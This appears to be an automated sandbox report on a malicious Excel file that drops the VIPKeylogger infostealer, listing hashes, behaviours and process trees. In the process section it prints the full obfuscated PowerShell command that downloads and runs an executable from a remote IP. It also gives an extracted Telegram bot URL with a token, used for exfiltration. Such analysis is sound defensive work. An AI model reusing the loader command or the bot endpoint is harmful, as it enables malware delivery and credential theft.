Analysis
-
max time kernel
117s -
max time network
120s -
platform
windows7_x64 -
resource
win7-20240708-en -
resource tags
arch:x64 arch:x86 image:win7-20240708-en locale:en-us os:windows7-x64 system -
submitted
21/08/2024, 07:07
Static task
static1
Behavioral task
behavioral1
Sample
ALFATECH-4500068045.xls
Resource
win7-20240708-en
Behavioral task
behavioral2
Sample
ALFATECH-4500068045.xls
Resource
win10v2004-20240802-en
General
-
Target
ALFATECH-4500068045.xls
-
Size
331KB
-
MD5
02b90b88aed63a901dbcb9f1c06e34c1
-
SHA1
0744024e070c8840acf9f787c18d279c242d1734
-
SHA256
a4004b765b4e62bd32933c91301f783d2b864bbb45cf9ae35f0b6681078bb40d
-
SHA512
b9394b6b59287940a94faceda10c584aae3155765e4bb88bbda4b04fe3bc23a1bf44951398ba723913c2c0c661a77c3efb6b000ff5a2efc312dc95c4bf81f901
-
SSDEEP
6144:c/WOvPZ8NdyOseQAz1Wapbb2zIFhzBvxaLqRRZYj+oUzCJeYILmCL1P:IWOX+PsJAz1p9fhzBIqRR4+BYILt1
Malware Config
Extracted
vipkeylogger
https://api.telegram.org/bot7121690251:AAEuf5zFrwn6F6mTVPJTwU5P1nN1ULFLElA/sendMessage?chat_id=7071568333
Signatures
-
VIPKeylogger
VIPKeylogger is a keylogger and infostealer written in C#. It resembles SnakeKeylogger, which was found in 2020.
-
Credentials from Password Stores: Credentials from Web Browsers 1 TTPs
Malicious access to, or copying of, the web browser credential store.
-
Blocklisted process makes network request 3 IoCs
flow | pid | Process
10 | 2944 | mshta.exe
11 | 2944 | mshta.exe
13 | 2128 | powershell.exe
-
Downloads MZ/PE file
-
Evasion via Device Credential Deployment 1 IoCs
pid | Process
2128 | powershell.exe
-
Executes dropped EXE 1 IoCs
pid | Process
264 | sihost.exe
-
Loads dropped DLL 1 IoCs
pid | Process
2128 | powershell.exe
-
resource | yara_rule
behavioral1/files/0x0006000000019372-58.dat | upx
behavioral1/memory/264-65-0x00000000008A0000-0x0000000000A2D000-memory.dmp | upx
behavioral1/memory/264-81-0x00000000008A0000-0x0000000000A2D000-memory.dmp | upx
-
Accesses Microsoft Outlook profiles 1 TTPs 3 IoCs
description | ioc | Process
Key opened | \REGISTRY\USER\S-1-5-21-2958949473-3205530200-1453100116-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 | RegSvcs.exe
Key opened | \REGISTRY\USER\S-1-5-21-2958949473-3205530200-1453100116-1000\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 | RegSvcs.exe
Key opened | \REGISTRY\USER\S-1-5-21-2958949473-3205530200-1453100116-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 | RegSvcs.exe
-
Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow | ioc
14 | checkip.dyndns.org
-
AutoIT Executable 1 IoCs
AutoIT scripts compiled to PE executables.
resource | yara_rule
behavioral1/memory/264-81-0x00000000008A0000-0x0000000000A2D000-memory.dmp | autoit_exe
-
Drops file in System32 directory 1 IoCs
description | ioc | Process
File opened for modification | C:\Windows\SysWOW64\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk | powershell.exe
-
Suspicious use of SetThreadContext 1 IoCs
description | pid | Process | procid_target
PID 264 set thread context of 268 | 264 | sihost.exe | 38
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
System Location Discovery: System Language Discovery 1 TTPs 8 IoCs
Attempts to gather information about the system language of a victim in order to infer the geographical location of that host.
description | ioc | Process
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | sihost.exe
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | RegSvcs.exe
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | EXCEL.EXE
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | mshta.exe
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | cmd.exe
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | powershell.exe
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | csc.exe
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | cvtres.exe
-
Enumerates system info in registry 2 TTPs 1 IoCs
description | ioc | Process
Key opened | \REGISTRY\MACHINE\Hardware\Description\System\FloatingPointProcessor | EXCEL.EXE
-
description | ioc | Process
Key created | \REGISTRY\USER\S-1-5-21-2958949473-3205530200-1453100116-1000\Software\Microsoft\Internet Explorer\Main | mshta.exe
-
Suspicious behavior: AddClipboardFormatListener 1 IoCs
pid | Process
2556 | EXCEL.EXE
-
Suspicious behavior: EnumeratesProcesses 5 IoCs
pid | Process
2128 | powershell.exe
2128 | powershell.exe
2128 | powershell.exe
268 | RegSvcs.exe
268 | RegSvcs.exe
-
Suspicious behavior: MapViewOfSection 1 IoCs
pid | Process
264 | sihost.exe
-
Suspicious use of AdjustPrivilegeToken 2 IoCs
description | pid | Process
Token: SeDebugPrivilege | 2128 | powershell.exe
Token: SeDebugPrivilege | 268 | RegSvcs.exe
-
Suspicious use of FindShellTrayWindow 2 IoCs
pid | Process
264 | sihost.exe
264 | sihost.exe
-
Suspicious use of SendNotifyMessage 2 IoCs
pid | Process
264 | sihost.exe
264 | sihost.exe
-
Suspicious use of SetWindowsHookEx 5 IoCs
pid | Process
2556 | EXCEL.EXE
2556 | EXCEL.EXE
2556 | EXCEL.EXE
2556 | EXCEL.EXE
2556 | EXCEL.EXE
-
Suspicious use of WriteProcessMemory 28 IoCs
description | pid | Process | procid_target
PID 2944 wrote to memory of 2188 | 2944 | mshta.exe | 32
PID 2944 wrote to memory of 2188 | 2944 | mshta.exe | 32
PID 2944 wrote to memory of 2188 | 2944 | mshta.exe | 32
PID 2944 wrote to memory of 2188 | 2944 | mshta.exe | 32
PID 2188 wrote to memory of 2128 | 2188 | cmd.exe | 34
PID 2188 wrote to memory of 2128 | 2188 | cmd.exe | 34
PID 2188 wrote to memory of 2128 | 2188 | cmd.exe | 34
PID 2188 wrote to memory of 2128 | 2188 | cmd.exe | 34
PID 2128 wrote to memory of 112 | 2128 | powershell.exe | 35
PID 2128 wrote to memory of 112 | 2128 | powershell.exe | 35
PID 2128 wrote to memory of 112 | 2128 | powershell.exe | 35
PID 2128 wrote to memory of 112 | 2128 | powershell.exe | 35
PID 112 wrote to memory of 2912 | 112 | csc.exe | 36
PID 112 wrote to memory of 2912 | 112 | csc.exe | 36
PID 112 wrote to memory of 2912 | 112 | csc.exe | 36
PID 112 wrote to memory of 2912 | 112 | csc.exe | 36
PID 2128 wrote to memory of 264 | 2128 | powershell.exe | 37
PID 2128 wrote to memory of 264 | 2128 | powershell.exe | 37
PID 2128 wrote to memory of 264 | 2128 | powershell.exe | 37
PID 2128 wrote to memory of 264 | 2128 | powershell.exe | 37
PID 264 wrote to memory of 268 | 264 | sihost.exe | 38
PID 264 wrote to memory of 268 | 264 | sihost.exe | 38
PID 264 wrote to memory of 268 | 264 | sihost.exe | 38
PID 264 wrote to memory of 268 | 264 | sihost.exe | 38
PID 264 wrote to memory of 268 | 264 | sihost.exe | 38
PID 264 wrote to memory of 268 | 264 | sihost.exe | 38
PID 264 wrote to memory of 268 | 264 | sihost.exe | 38
PID 264 wrote to memory of 268 | 264 | sihost.exe | 38
-
outlook_office_path 1 IoCs
description | ioc | Process
Key opened | \REGISTRY\USER\S-1-5-21-2958949473-3205530200-1453100116-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 | RegSvcs.exe
-
outlook_win_path 1 IoCs
description | ioc | Process
Key opened | \REGISTRY\USER\S-1-5-21-2958949473-3205530200-1453100116-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 | RegSvcs.exe
Processes
-
C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE"C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE" /dde C:\Users\Admin\AppData\Local\Temp\ALFATECH-4500068045.xls1⤵
- System Location Discovery: System Language Discovery
- Enumerates system info in registry
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of SetWindowsHookEx
PID:2556
-
C:\Windows\SysWOW64\mshta.exeC:\Windows\SysWOW64\mshta.exe -Embedding1⤵
- Blocklisted process makes network request
- System Location Discovery: System Language Discovery
- Modifies Internet Explorer settings
- Suspicious use of WriteProcessMemory
PID:2944 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" "/c PowERsHelL -eX ByPASS -noP -W 1 -C DeVicecReDEntiAlDePLoymENt.exE ; ieX($(ieX('[sYsTEM.tEXt.eNcODIng]'+[CHAR]58+[ChAR]0X3a+'UtF8.gEtSTRing([sYsTem.CONVErt]'+[cHar]58+[cHaR]0X3A+'fromBasE64StRINg('+[cHAr]34+'JDE4WXFZOXV5djNJICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA9ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBhREQtVFlQRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU1lbUJlcmRFRklOaXRJb24gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICdbRGxsSW1wb3J0KCJ1ckxNb24iLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgVUlLRGtkUixzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIE5Cam1uZkUsc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBHdklWcWcsdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQWFVT0VYV3h4LEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgTnFYdEZkakIpOycgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OYW1lICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiZSIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1uYW1FU1BBY0UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHVkRXRpUnFrICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtUGFzc1RocnU7ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAkMThZcVk5dXl2M0k6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly80NS42Ni4yMzEuMjA5LzM1MC9zaWhvc3QuZXhlIiwiJEVOVjpBUFBEQVRBXHNpaG9zdC5leGUiLDAsMCk7U3RhUnQtU0xlRVAoMyk7U1RhclQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkRW52OkFQUERBVEFcc2lob3N0LmV4ZSI='+[CHar]34+'))')))"2⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:2188 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exePowERsHelL -eX ByPASS -noP -W 1 -C DeVicecReDEntiAlDePLoymENt.exE ; ieX($(ieX('[sYsTEM.tEXt.eNcODIng]'+[CHAR]58+[ChAR]0X3a+'UtF8.gEtSTRing([sYsTem.CONVErt]'+[cHar]58+[cHaR]0X3A+'fromBasE64StRINg('+[cHAr]34+'JDE4WXFZOXV5djNJICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA9ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBhREQtVFlQRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU1lbUJlcmRFRklOaXRJb24gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICdbRGxsSW1wb3J0KCJ1ckxNb24iLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgVUlLRGtkUixzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIE5Cam1uZkUsc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBHdklWcWcsdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQWFVT0VYV3h4LEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgTnFYdEZkakIpOycgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OYW1lICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiZSIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1uYW1FU1BBY0UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHVkRXRpUnFrICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtUGFzc1RocnU7ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAkMThZcVk5dXl2M0k6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly80NS42Ni4yMzEuMjA5LzM1MC9zaWhvc3QuZXhlIiwiJEVOVjpBUFBEQVRBXHNpaG9zdC5leGUiLDAsMCk7U3RhUnQtU0xlRVAoMyk7U1RhclQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkRW52OkFQUERBVEFcc2lob3N0LmV4ZSI='+[CHar]34+'))')))"3⤵
- Blocklisted process makes network request
- Evasion via Device Credential Deployment
- Loads dropped DLL
- Drops file in System32 directory
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2128 -
C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe"C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\w_wxvdsu.cmdline"4⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:112 -
C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exeC:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES8A37.tmp" "c:\Users\Admin\AppData\Local\Temp\CSC8A26.tmp"5⤵
- System Location Discovery: System Language Discovery
PID:2912
-
C:\Users\Admin\AppData\Roaming\sihost.exe"C:\Users\Admin\AppData\Roaming\sihost.exe"4⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- System Location Discovery: System Language Discovery
- Suspicious behavior: MapViewOfSection
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
PID:264 -
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"C:\Users\Admin\AppData\Roaming\sihost.exe"5⤵
- Accesses Microsoft Outlook profiles
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- outlook_office_path
- outlook_win_path
PID:268
Network
MITRE ATT&CK Enterprise v15
Downloads
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\8B2B9A00839EED1DFDCCC3BFC2F5DF12
Filesize: 174B
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
Filesize: 342B
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\B46811C17859FFB409CF0E904A4AA8F8
Filesize: 170B
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\X761FPIN\icreamnet[1].hta
Filesize: 12KB